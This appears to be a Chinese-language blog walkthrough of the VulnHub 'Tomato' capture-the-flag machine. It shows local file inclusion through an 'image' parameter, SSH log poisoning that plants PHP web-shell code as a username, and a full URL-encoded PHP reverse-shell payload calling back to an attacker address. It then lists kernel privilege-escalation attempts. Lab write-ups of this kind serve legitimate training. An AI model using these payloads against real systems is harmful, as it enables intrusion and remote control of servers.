37、Tomato(VulnHub)

Tomato

一、nmap

image-20240415140601764

image-20240415140608030

2211是ssh的端口,21的ftp也不是弱密码

image-20240415140707281

image-20240415141738806

二、web渗透

随便看看

image-20240415141040323

image-20240415141151705

目录爆破

image-20240415141954187

image-20240415142001793

/seclists/Discovery/Web-Content/common.txt

image-20240415142401812

/antibot_image/antibots/readme.txt

发现该站点存在反爬机制

image-20240415144920809

/antibot_image/antibots/info.php

提示我们该网页存在个参数 GET:image参数

image-20240415145239568

image参数文件包含

image-20240415145614756

tomato:x:1000:1000:Tomato,,,:/home/tomato:/bin/bash

包含出/var/log/auth.log文件

image-20240415150523295

测试看能不能写入日志

发现是成功写入用户名的

image-20240415150738006

ssh的恶意代码写入小插曲

这里很莫名其妙,kali的ssh就是无法连接一直显示remote username contains invalid characters

image-20240415154757888

使用Windows上装的linux内核mingw64运行

ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.126.235 -p 2211

image-20240415153743346

image-20240415154029252

image-20240415155104196

ssh的恶意代码写入

输入ssh '<?php echo shell_exec($_GET["cmd"]); ?>'@192.168.126.235 -p2211来将恶意代码视为用户名,利用log写入到靶机中(外侧一定要使用单引号,cmd使用双引号。否则无法执行)。不过再次包含 log文件的时候并没有发现恶意代码,这是个好事表明靶机并没有将恶意代码当为字符串执行,而是将其看为 php代码执行所以导致无法查看。上载下面的 payload发现成功的反弹了shell

ssh '<?php system($_GET["cmd"]); ?>'@192.168.126.235 -p2211
或
ssh '<?php echo shell_exec($_GET["cmd"]); ?>'@192.168.126.235 -p2211

image-20240415154137411

view-source:http://192.168.126.235/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log&&cmd=ls

image-20240415155405600

ssh的恶意代码写入反弹shell

php代码反弹shell
php -r '$sock=fsockopen("192.168.126.201",3388);exec("/bin/sh -i <&3 >&3 2>&3");'

url编码后:
php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.126.201%22%2C3388%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

完整payload:
http://192.168.126.235/antibot_image/antibots/info.php?image=../../../../../../../../var/log/auth.log&cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.126.201%22%2C3388%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27

image-20240415155945242

三、内网渗透

随便看看

python3 -c 'import pty; pty.spawn("/bin/bash")'

image-20240415160145098

尝试提权

image-20240415160238425

/linpeas.sh

image-20240415161459821

image-20240415161521135

image-20240415171132872

dirtyc0w提权尝试

image-20240415162742234

image-20240415162711523

CVE-2024-1086提权尝试

image-20240415163736951

kali本地编译CVE-2017-6074提权尝试

image-20240415170347850

image-20240415170408496

失败

换Ubuntu本地编译CVE-2017-6074提权尝试

image-20240415172215352

image-20240415170519723

成功

proof.txt

不过手要快哦,漏洞打进去很快系统就受不了了

image-20240415171306541

  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值